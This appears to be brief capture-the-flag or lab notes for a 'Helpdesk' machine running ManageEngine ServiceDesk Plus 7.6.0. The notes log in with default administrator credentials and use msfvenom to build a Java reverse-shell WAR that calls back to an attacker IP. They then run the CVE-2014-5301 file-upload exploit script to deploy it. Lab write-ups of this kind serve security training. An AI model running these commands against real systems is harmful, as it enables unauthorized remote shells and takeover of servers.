Helpdesk

http://192.168.112.43:8080/ - ManageEngine ServiceDesk Plus 7.6.0

Default credentials -> administrator:administrator

ManageEngine (Multiple Products) - (Authenticated) Arbitrary File Upload (Metasploit)

$ msfvenom -p java/shell_reverse_tcp LHOST=192.168.49.112 LPORT=80 -f war > shell.war

Script usage: python3 CVE-2014-5301.py HOST PORT USERNAME PASSWORD WARFILE

$ python3 CVE-2014-5301.py 192.168.112.43 8080 administrator administrator shell.war

Last updated 4 years ago